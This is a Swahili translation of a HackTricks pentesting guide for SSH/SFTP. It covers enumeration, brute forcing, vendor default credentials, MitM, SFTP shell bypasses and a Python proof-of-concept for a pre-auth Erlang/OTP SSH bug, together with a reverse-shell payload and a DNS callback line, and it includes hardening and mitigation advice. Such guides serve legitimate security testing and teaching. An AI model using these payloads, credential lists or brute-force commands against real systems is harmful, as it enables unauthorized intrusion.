HackTricks22 - Pentesting SSH/SFTP
Reading time: 16 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Taarifa za Msingi
SSH (Secure Shell or Secure Socket Shell) ni itifaki ya mtandao inayowezesha muunganisho salama kwa kompyuta kupitia mtandao usio salama. Ni muhimu kwa kudumisha usiri na uadilifu wa data unapoingia kwenye mifumo ya mbali.
Bandari ya chaguo-msingi: 22
22/tcp open ssh syn-ack
Seva za SSH:
- openSSH β OpenBSD SSH, inayopatikana katika BSD, distributions za Linux na Windows tangu Windows 10
- Dropbear β Utekelezaji wa SSH kwa mazingira yenye kumbukumbu ndogo na rasilimali za prosesa, hutolewa katika OpenWrt
- PuTTY β Utekelezaji wa SSH kwa Windows; mteja hutumika sana lakini matumizi ya seva ni nadra
- CopSSH β utekelezaji wa OpenSSH kwa Windows
Maktaba za SSH (kutekeleza upande wa seva):
- libssh β maktaba ya C ya multiplatform inayotekeleza protocol ya SSHv2 na bindings katika Python, Perl na R; inatumika na KDE kwa sftp na pia na GitHub kwa miundombinu ya git SSH
- wolfSSH β maktaba ya seva ya SSHv2 iliyoandikwa kwa ANSI C na iliyolengwa kwa vifaa vya embedded, RTOS, na mazingira yenye rasilimali ndogo
- Apache MINA SSHD β maktaba ya Apache SSHD ya Java inategemea Apache MINA
- paramiko β maktaba ya Python ya protocol ya SSHv2
Enumeration
Banner Grabbing
nc -vn <IP> 22
Otomatiki ssh-audit
ssh-audit ni chombo cha ukaguzi wa usanidi wa seva na mteja wa SSH.
https://github.com/jtesta/ssh-audit ni fork iliyosasishwa kutoka https://github.com/arthepsy/ssh-audit/
Vipengele:
- Msaada wa seva kwa itifaki za SSH1 na SSH2;
- kuchambua usanidi wa mteja wa SSH;
- kupata banner, kutambua kifaa au programu na mfumo wa uendeshaji, kugundua compression;
- kusanya key-exchange, host-key, encryption na message authentication code algoritimu;
- tolea taarifa za algoritimu (inapatikana tangu, imeondolewa/imezimwa, hatari/dhaifu/ya zamani, n.k.);
- tolea mapendekezo ya algoritimu (ongeza au ondoa kulingana na toleo la programu lililotambuliwa);
- tolea taarifa za usalama (masuala yanayohusiana, orodha ya CVE zilizotolewa, n.k.);
- kuchambua utangamano wa toleo la SSH kulingana na taarifa za algoritimu;
- taarifa za kihistoria kutoka OpenSSH, Dropbear SSH na libssh;
- inafanya kazi kwenye Linux na Windows;
- hakuna utegemezi
usage: ssh-audit.py [-1246pbcnjvlt] <host>
-1, --ssh1 force ssh version 1 only
-2, --ssh2 force ssh version 2 only
-4, --ipv4 enable IPv4 (order of precedence)
-6, --ipv6 enable IPv6 (order of precedence)
-p, --port=<port> port to connect
-b, --batch batch output
-c, --client-audit starts a server on port 2222 to audit client
software config (use -p to change port;
use -t to change timeout)
-n, --no-colors disable colors
-j, --json JSON output
-v, --verbose verbose output
-l, --level=<level> minimum output level (info|warn|fail)
-t, --timeout=<secs> timeout (in seconds) for connection and reading
(default: 5)
$ python3 ssh-audit <IP>
Tazama inavyofanya kazi (Asciinema)
Ufunguo wa umma wa SSH wa server
ssh-keyscan -t rsa <IP> -p <PORT>
Algoritimu dhaifu za cipher
Hii inagunduliwa kwa chaguo-msingi na nmap. Lakini unaweza pia kutumia sslcan au sslyze.
Scripts za Nmap
nmap -p22 <ip> -sC # Send default nmap scripts for SSH
nmap -p22 <ip> -sV # Retrieve version
nmap -p22 <ip> --script ssh2-enum-algos # Retrieve supported algorythms
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full # Retrieve weak keys
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # Check authentication methods
Shodan
ssh
Brute force usernames, passwords and private keys
Username Enumeration
Katika baadhi ya matoleo ya OpenSSH unaweza kufanya timing attack ili enumerate users. Unaweza kutumia metasploit module ili ku-exploit hili:
msf> use scanner/ssh/ssh_enumusers
Brute force
Baadhi ya ssh credentials zifuatazo ziko here and here na hapa chini.
Private Key Brute Force
Ikiwa unajua baadhi ya ssh private keys ambazo zinaweza kutumika... tujaribu. Unaweza kutumia nmap script:
https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html
Au MSF auxiliary module:
msf> use scanner/ssh/ssh_identify_pubkeys
Au tumia ssh-keybrute.py (inaendeshwa na python3, nyepesi na ina legacy algorithms zimeshwezeshwa): snowdroppe/ssh-keybrute.
badkeys zilizojulikana zinaweza kupatikana hapa:
ssh-badkeys/authorized at master \xc2\xb7 rapid7/ssh-badkeys \xc2\xb7 GitHub
Weak SSH keys / Debian predictable PRNG
Baadhi ya mifumo zina dosari zilizo wazi kwenye random seed inayotumika kuzalisha cryptographic material. Hii inaweza kusababisha keyspace iliyopunguzwa kwa kiasi kikubwa ambayo inaweza kufunguliwa kwa bruteforce. Seti zilizotayarishwa awali za keys zilizozalishwa kwenye Debian systems zilizoathiriwa na weak PRNG zinapatikana hapa: g0tmi1k/debian-ssh.
Unapaswa kuangalia hapa ili kutafuta keys halali za mashine ya mwathiriwa.
Kerberos / GSSAPI SSO
If the target SSH server supports GSSAPI (for example Windows OpenSSH on a domain controller), you can authenticate using your Kerberos TGT instead of a password.
Mtiririko wa kazi kutoka kwenye mwenyeji wa mshambuliaji wa Linux:
# 1) Ensure time is in sync with the KDC to avoid KRB_AP_ERR_SKEW
sudo ntpdate <dc.fqdn>
# 2) Generate a krb5.conf for the target realm (optional, but handy)
netexec smb <dc.fqdn> -u <user> -p '<pass>' -k --generate-krb5-file krb5.conf
sudo cp krb5.conf /etc/krb5.conf
# 3) Obtain a TGT for the user
kinit <user>
klist
# 4) SSH with GSSAPI, using the FQDN that matches the host SPN
ssh -o GSSAPIAuthentication=yes <user>@<host.fqdn>
Notes:
- Ikiwa unajiunga kwa jina lisilo sahihi (kwa mfano, short host, alias, au mpangilio usio sahihi katika
/etc/hosts), unaweza kupata: "Server not found in Kerberos database" kwa sababu SPN haitalingana. crackmapexec ssh --kerberospia inaweza kutumia ccache yako kwa Kerberos auth.
Nenosiri za Chaguo-msingi
| Vendor | Usernames | Passwords |
|---|---|---|
| APC | apc, device | apc |
| Brocade | admin | admin123, password, brocade, fibranne |
| Cisco | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin | admin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme |
| Citrix | root, nsroot, nsmaint, vdiadmin, kvm, cli, admin | C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler |
| D-Link | admin, user | private, admin, user |
| Dell | root, user1, admin, vkernel, cli | calvin, 123456, password, vkernel, Stor@ge!, admin |
| EMC | admin, root, sysadmin | EMCPMAdm7n, Password#1, Password123#, sysadmin, changeme, emc |
| HP/3Com | admin, root, vcx, app, spvar, manage, hpsupport, opc_op | admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC_op, !manage, !admin |
| Huawei | admin, root | 123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123 |
| IBM | USERID, admin, manager, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, system, device, ufmcli, customer | PASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer |
| Juniper | netscreen | netscreen |
| NetApp | admin | netapp123 |
| Oracle | root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user | changeme, ilom-admin, ilom-operator, welcome1, oracle |
| VMware | vi-admin, root, hqadmin, vmware, admin | vmware, vmw@re, hqadmin, default |
SSH-MitM
Ikiwa uko kwenye mtandao wa ndani na ni mwathirika ambaye anataka kuungana na server ya SSH kwa kutumia username na password unaweza kujaribu kufanya shambulio la MitM ili kuiba taarifa hizo za kuingia:
Njia ya shambulio:
- Traffic Redirection: Mshambuliaji huielekeza trafiki ya mwathirika kwenye mashine yao, kwa hivyo kwa ufanisi huchukua jaribio la kuunganishwa na server ya SSH.
- Interception and Logging: Mashine ya mshambuliaji inafanya kazi kama proxy, ikiwa inakamata maelezo ya kuingia ya mtumiaji kwa kujifanya kuwa server halali ya SSH.
- Command Execution and Relay: Hatimaye, server ya mshambuliaji inarekodi nywila za mtumiaji, inatuma amri kwa server halisi ya SSH, inaziendesha, na inarejesha matokeo kwa mtumiaji, na kufanya mchakato uonekane laini na halali.
SSH MITM inafanya kabisa kile kilichoelezwa hapo juu.
Ili kutekeleza MitM halisi unaweza kutumia mbinu kama ARP spoofing, DNS spoofin au nyingine zilizoelezewa katika Network Spoofing attacks.
SSH-Snake
Ikiwa unataka kusafiri kupitia mtandao ukitumia SSH private keys ulizogundua kwenye mifumo, ukitumia kila private key kwenye kila mfumo kwa ajili ya hosts mpya, basi SSH-Snake ndiyo unayohitaji.
SSH-Snake inatekeleza majukumu yafuatayo kimitambo na kirekurensi:
- Kwenye mfumo wa sasa, tafuta vifunguo vya kibinafsi vya SSH,
- Kwenye mfumo wa sasa, tafuta hosts au destinations (user@host) ambazo vifunguo vinaweza kukubaliwa,
- Jaribu ku-SSH kwenye destinations zote ukitumia vifunguo vyote vilivyogunduliwa,
- Ikiwa destination imefanikiwa kuunganishwa, irudia hatua #1 - #4 kwenye mfumo uliounganishwa.
Ni yenye uwezo wa kujirudia na kujieneza yenyewe kabisa -- na haina faili kabisa (completely fileless).
Mipangilio Isiyofaa
Root login
Ni kawaida kwa server za SSH kuruhusu kuingia kwa mtumiaji root kwa chaguo-msingi, jambo ambalo ni hatari kubwa ya usalama. Kuizima root login ni hatua muhimu katika kuimarisha server. Ufikiaji usioidhinishwa kwa vibali vya utawala na mashambulio ya brute force yanaweza kupunguzwa kwa kufanya mabadiliko haya.
To Disable Root Login in OpenSSH:
- Edit the SSH config file with:
sudoedit /etc/ssh/sshd_config - Change the setting from
#PermitRootLogin yestoPermitRootLogin no. - Reload the configuration using:
sudo systemctl daemon-reload - Restart the SSH server to apply changes:
sudo systemctl restart sshd
SFTP Brute Force
SFTP command execution
Kuna upotevu wa usalama unaotokea mara kwa mara katika maandalizi ya SFTP, ambapo watawala wanakusudia watumiaji kubadilishana faili bila kuwezesha ufikiaji wa shell ya mbali. Licha ya kuweka watumiaji na shells zisizo za mwingiliano (kwa mfano, /usr/bin/nologin) na kuwapangia kwenye saraka maalum, kuna mgongano wa usalama. Watumiaji wanaweza kuepuka vikwazo hivi kwa kuomba utekelezaji wa amri (kama /bin/bash) mara tu baada ya kuingia, kabla shell yao isiyo ya mwingiliano haijachukua nafasi. Hii inaruhusu utekelezaji wa amri bila idhini, na kuharibu hatua za usalama zilizokusudiwa.
ssh -v noraj@192.168.1.94 id
...
Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 192.168.1.94 ([192.168.1.94]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
uid=1000(noraj) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
Bytes per second: sent 43133.4, received 44349.5
debug1: Exit status 0
$ ssh noraj@192.168.1.94 /bin/bash
Hapa kuna mfano wa usanidi salama wa SFTP (/etc/ssh/sshd_config β openSSH) kwa mtumiaji noraj:
Match User noraj
ChrootDirectory %h
ForceCommand internal-sftp
AllowTcpForwarding no
PermitTunnel no
X11Forwarding no
PermitTTY no
Usanidi huu utaruhusu SFTP pekee: unazuia ufikiaji wa shell kwa kulazimisha start command na kuzuia ufikiaji wa TTY, lakini pia unazuia aina zote za port forwarding au tunneling.
SFTP Tunneling
Ikiwa una ufikiaji wa seva ya SFTP, unaweza pia tunnel trafiki yako kupitia hii β kwa mfano kwa kutumia port forwarding ya kawaida:
sudo ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip_compromised>
SFTP Symlink
sftp ina amri "symlink". Kwa hiyo, ikiwa una ruhusa za kuandika katika folda fulani, unaweza kuunda symlinks za folda/faili nyingine. Kwa kuwa labda umezuiliwa ndani ya chroot, hili haitakuwa hasa la manufaa kwako; lakini, ikiwa unaweza kufikia symlink iliyoundwa kutoka kwa no-chroot huduma (kwa mfano, ikiwa unaweza kufikia symlink kutoka kwenye mtandao), unaweza kufungua faili zilizounganishwa kwa symlink kupitia mtandao.
Kwa mfano, kuunda symlink kutoka kwa faili mpya "froot" hadi "/":
sftp> symlink / froot
Ikiwa unaweza kufikia faili "froot" kupitia wavuti, utaweza kuorodhesha folda ya root ("/") ya mfumo.
Mbinu za uthibitishaji
Katika mazingira yenye usalama wa juu, kawaida ni kuwezesha uthibitishaji unaotegemea funguo pekee au uthibitishaji wa vipengele viwili badala ya uthibitishaji rahisi unaotegemea nywila. Lakini mara nyingi mbinu zenye nguvu zaidi zinawezeshwa bila kuzima zile dhaifu. Mfano wa kawaida ni kuwezesha publickey katika usanidi wa openSSH na kuiweka kama njia ya chaguo-msingi lakini kutokuzima password. Kwa hivyo kwa kutumia verbose mode ya SSH client mshambuliaji anaweza kuona kwamba njia dhaifu imewezeshwa:
ssh -v 192.168.1.94
OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive
Kwa mfano, ikiwa authentication failure limit imewekwa na haupati fursa ya kufikia password method, unaweza kutumia chaguo la PreferredAuthentications kulazimisha kutumia method hii.
ssh -v 192.168.1.94 -o PreferredAuthentications=password
...
debug1: Next authentication method: password
Mapitio ya usanidi wa SSH server ni muhimu ili kuhakikisha kwamba njia zinazotarajiwa pekee ndizo zimeruhusiwa. Kutumia verbose mode kwenye client kunaweza kusaidia kuona ufanisi wa usanidi.
Faili za usanidi
ssh_config
sshd_config
authorized_keys
ssh_known_hosts
known_hosts
id_rsa
Fuzzing
- https://packetstormsecurity.com/files/download/71252/sshfuzz.txt
- https://www.rapid7.com/db/modules/auxiliary/fuzzers/ssh/ssh_version_2
Authentication State-Machine Bypass (Pre-Auth RCE)
Matoleo kadhaa ya server za SSH yana kasoro za mantiki katika authentication finite-state machine zinazomruhusu mteja kutuma ujumbe za connection-protocol kabla uthibitisho haujakamilika. Kwa sababu server haifanyi uhakiki wa kuwa iko katika hali sahihi, ujumbe hayo yanashughulikiwa kana kwamba mtumiaji ameidhinishwa kabisa, na kusababisha unauthenticated code execution au kuunda kikao.
Kiwango cha protocol, ujumbe wowote wa SSH wenye message code β₯ 80 (0x50) unahusiana na tabaka la connection (RFC 4254) na lazima ukubaliwe tu baada ya uthibitisho kufanikiwa (RFC 4252). Ikiwa server itashughulikia mojawapo ya ujumbe huo ilipokuwa bado katika hali ya SSH_AUTHENTICATION, mshambuliaji anaweza mara moja kuunda channel na kuomba vitendo kama command execution, port-forwarding, nk.
Generic Exploitation Steps
- Tengeneza muunganisho wa TCP kwenye port ya SSH ya lengo (kawaida 22, lakini huduma zingine zinaweza kuonyesha Erlang/OTP kwenye 2022, 830, 2222β¦).
- Unda raw SSH packet:
- 4-byte packet_length (big-endian)
- 1-byte message_code β₯ 80 (mf.
SSH_MSG_CHANNEL_OPEN= 90,SSH_MSG_CHANNEL_REQUEST= 98) - Payload itakayofahamika na aina ya message iliyochaguliwa
- Tuma packet(s) kabla ya kumaliza hatua yoyote ya uthibitisho.
- Ingiliana na server APIs ambazo sasa zimefunuliwa pre-auth (command execution, port forwarding, file-system access, β¦).
Muhtasari wa proof-of-concept wa Python:
import socket, struct
HOST, PORT = '10.10.10.10', 22
s = socket.create_connection((HOST, PORT))
# skip version exchange for brevity β send your own client banner then read server banner
# β¦ key exchange can be skipped on vulnerable Erlang/OTP because the bug is hit immediately after the banner
# Packet: len(1)=1, SSH_MSG_CHANNEL_OPEN (90)
pkt = struct.pack('>I', 1) + b'\x5a' # 0x5a = 90
s.sendall(pkt)
# additional CHANNEL_REQUEST packets can follow to run commands
Katika vitendo utahitaji kufanya (au kupitisha) key-exchange kulingana na utekelezaji wa lengo, lakini no authentication haifanyiwi kamwe.
Erlang/OTP sshd (CVE-2025-32433)
- Affected versions: OTP < 27.3.3, 26.2.5.11, 25.3.2.20
- Root cause: Erlang native SSH daemon haithibitishi hali ya sasa kabla ya kuita
ssh_connection:handle_msg/2. Kwa hiyo kifurushi chochote chenye message code 80-255 kinawafikia handler wa muunganisho wakati kikao bado kiko katika hali ya userauth. - Impact: unauthenticated remote code execution (the daemon usually runs as root on embedded/OT devices).
Mfano wa payload inayozaa reverse shell bound to the attacker-controlled channel:
% open a channel first β¦ then:
execSinet:cmd(Channel, "exec('/bin/sh', ['-i'], [{fd, Channel#channel.fd}, {pid, true}]).").
Blind RCE / out-of-band detection inaweza kufanywa kupitia DNS:
execSinet:gethostbyname("<random>.dns.outbound.watchtowr.com").Zsession
Utambuzi na Kupunguza:
- Inspect SSH traffic: drop any packet with message code β₯ 80 observed before authentication.
- Sasisha Erlang/OTP hadi 27.3.3 / 26.2.5.11 / 25.3.2.20 au toleo jipya zaidi.
- Punguza kuonekana kwa bandari za usimamizi (22/2022/830/2222) β hasa kwenye vifaa vya OT.
Utekelezaji Mengine Ulioathirika
- libssh 0.6 β 0.8 (server side) β CVE-2018-10933 β inakubali
SSH_MSG_USERAUTH_SUCCESSisiyothibitishwa iliyotumwa na mteja, kwa maana ni kosa la mantiki la kinyume.
Mafunzo ya kawaida ni kwamba mabadiliko yoyote kutoka kwa mabadiliko ya hali yanayotakiwa na RFC yanaweza kuwa hatari; wakati ukikagua au ukifanya fuzzing ya SSH daemons zingatia hasa utekelezaji wa mashine ya hali.
Marejeo
- Unit 42 β Erlang/OTP SSH CVE-2025-32433
- SSH hardening guides
- Turgensec SSH hacking guide
- Pentesting Kerberos (88) β client setup and troubleshooting
- 0xdf β HTB: TheFrizz
Amri za Otomatiki za HackTricks
Protocol_Name: SSH
Port_Number: 22
Protocol_Description: Secure Shell Hardening
Entry_1:
Name: Hydra Brute Force
Description: Need Username
Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 {IP} ssh
Entry_2:
Name: consolesless mfs enumeration
Description: SSH enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit'
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na π¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter π¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.